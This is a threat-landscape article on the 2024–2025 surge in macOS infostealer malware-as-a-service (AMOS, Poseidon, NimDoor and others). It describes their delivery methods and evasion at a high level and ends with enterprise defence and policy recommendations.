Long treated as a safer corner of the internet, Apple’s macOS has entered its most perilous phase yet. Between 2024 and 2025, detections of Mac-focused threats led by information-stealing malware rented “as a service” spiked dramatically, erasing the old assumption that Macs were harder targets. A new criminal economy now blends malvertising, Trojanized apps, and social engineering to lift passwords, wallets, and corporate secrets at scale.
From Niche Platform to Prime Target
For years, Macs’ smaller market share, Unix underpinnings, and Apple’s app controls were seen as natural armor. That perception has collapsed. Security teams tracking endpoint telemetry report a step-change: Mac-specific threats surged through 2024 into 2025, with information stealers driving the curve. The shift reflects fundamentals more Macs in offices and creative shops, more high-value data sitting behind iCloud and keychains, and a thriving criminal market eager to monetize it.
Final Call: Be DPDP Act Ready with FCRF’s Certified Data Protection Officer Program
Crucially, this is not a Windows playbook crudely ported to Macs. Adversaries now design first-class macOS campaigns that understand AppleScript prompts, Gatekeeper flows, Transparency/Consent (TCC) dialogs, and user habits—particularly the tendency to override warnings when a download looks “familiar enough.” The result is a steady stream of compromises that begin with a single click and end with wide data exposure.
Inside the New Mac Stealers
A commercial crime stack. The defining feature of this wave is the Malware-as-a-Service (MaaS) model, which rents out polished Mac stealers—complete with updates, affiliate dashboards, customer “support,” and turnkey command-and-control. Atomic Stealer (AMOS) became the template: a subscription product that harvests keychain secrets, browser cookies, saved logins, credit cards, crypto wallets, and documents. In mid-2024 it added a persistent backdoor, shifting from smash-and-grab to durable remote access.
AMOS’s close relative, Poseidon, surged later in 2024, quickly grabbing the largest share of Mac stealer activity without displacing AMOS—evidence that the market itself expanded. Other families round out the ecosystem:
- Cuckoo (Objective-C) blends infostealing with spyware-like audio/video capture and keychain dumps, often hiding behind fake or low-quality utilities and abusing LaunchAgents for persistence.
- MetaStealer and newer Python-heavy families such as PXA Stealer target a broad set of Chromium/Gecko browsers, file-transfer tools, VPN clients, and dozens of desktop wallets; some route exfiltration through Telegramor Cloudflare-fronted relays to blend with normal traffic.
- ZuRu pivots to developers, impersonating popular tools (e.g., Termius) and swapping in helper apps that fetch a rich C2 implant capable of recon, file ops, and shell execution.
- FrigidStealer arrives via fake “update” pages (Safari/Chrome-themed DMGs), while Koi chases wallets and even password-manager extensions.
- State-aligned kits have entered the scene: NimDoor (attributed to DPRK operators) uses Nim-compiled binaries, AppleScript droppers masked as “Zoom SDK” updates, rare process-injection and wss-based (TLS) C2—techniques once rare in macOS malware.
How attacks land. Delivery is sophisticated, but human. The leading paths:
- Malvertising & SEO poisoning: Look-alike ads and search results for popular Mac software (Homebrew, design tools, remote desktop clients) lead to cloned sites serving trojanized DMGs.
- Trojanized installers & fake updates: “New version” pop-ups or cloned vendor flows cajole users into bypassing Gatekeeper—notarization gaps persist, and some malware now ships signed to glide past default blocks.
- Phishing & social engineering: Spear-phish lures (e.g., job tests, copyright “complaints,” Zoom scripts) push victims to run AppleScript droppers or paste Terminal commands. Discord/Teams/Slack are exploited for trust and delivery.
- Supply chain & PPI services: Typosquatted libraries and pay-per-install networks scale distribution; expired invite links on Discord are quietly re-used to funnel users into malicious servers.
Staying hidden. Families use XOR/string obfuscation, per-build DMG hashes, JXA/AppleScript prompts that mimic macOS dialogs, and stealthy persistence (LaunchAgents/Daemons, login items, cron). More advanced samples inject into benign processes or run filelessly from memory. Several abuse mainstream platforms—Telegram, Discord, Google services—for C2 and data staging, making network detection harder.
Who’s behind it. The cast spans Russian-speaking syndicates (deep in MaaS, bulletproof hosting and ad infrastructure), DPRK operators (Web3/crypto targeting, high tradecraft), and Chinese APTs with dual espionage/financial motives. Financial crews like traffic sellers and loader operators stitch this economy together, renting distribution and laundering infrastructure.
Defense, Policy, and the Road Ahead
The human layer is the fault line. Apple closed a popular Gatekeeper bypass in macOS Sequoia, but attackers adapted by sharpening lures and signing more binaries. The reliable pivot remains social engineering: a plausible ad, a familiar brand, a single password prompt. Most successful Mac intrusions still begin with a user decision.
What enterprises can do now:
- Treat Macs like any other tier-one asset. Deploy modern EDR/XDR with behavior analytics tuned for macOS (rare keychain access, AppleScript execution chains, unusual browser DB reads, cookie/session theft).
- Harden and reduce attack surface. Enforce least-privilege (standard, not admin, for daily work), lock down AppleScript where feasible, block known-bad ad/typosquat domains via DNS/web filtering, and keep macOS and third-party apps aggressively patched.
- Constrain software sources. Prefer the Mac App Store or vendor-verified links; discourage “download via search results.” For developers, scrutinize installers and Xcode projects.
- Train continuously. Simulate malvertising and fake-update lures; teach staff to distrust surprise prompts and to avoid Terminal pastes from unknown sources.
- Monitor persistence & exfil. Audit LaunchAgents/Daemons and login items; inspect outbound connections to messaging/CDN platforms when paired with suspicious process trees.
- Plan for compromise. Practice incident playbooks that include keychain credential rotation, TCC reset, cookie/session invalidation, and targeted threat hunting for known Mac stealer TTPs.
Policy and platform pressure
Apple’s tighter notarization and Gatekeeper checks help, but notarized malware is no longer hypothetical. The harder problems live upstream: advertising supply chains that allow look-alike campaigns, bulletproof hosting that rapidly re-homes C2s, and ubiquitous chat/CDN platforms that blur malicious and legitimate traffic. Progress will hinge on ad-network verification, faster takedown of abusive ASNs, and better ecosystem telemetry sharing between platform vendors and security teams.
The larger story is cultural as much as technical. The “Macs don’t get malware” trope lingers in small firms, creative shops, and even parts of the enterprise. In 2025, that complacency is the vulnerability. The crimeware market has discovered a reliable product-market fit on macOS; reversing the momentum will require enterprises to close the human gaps, and vendors and ad platforms to choke off the distribution rails that made this boom possible.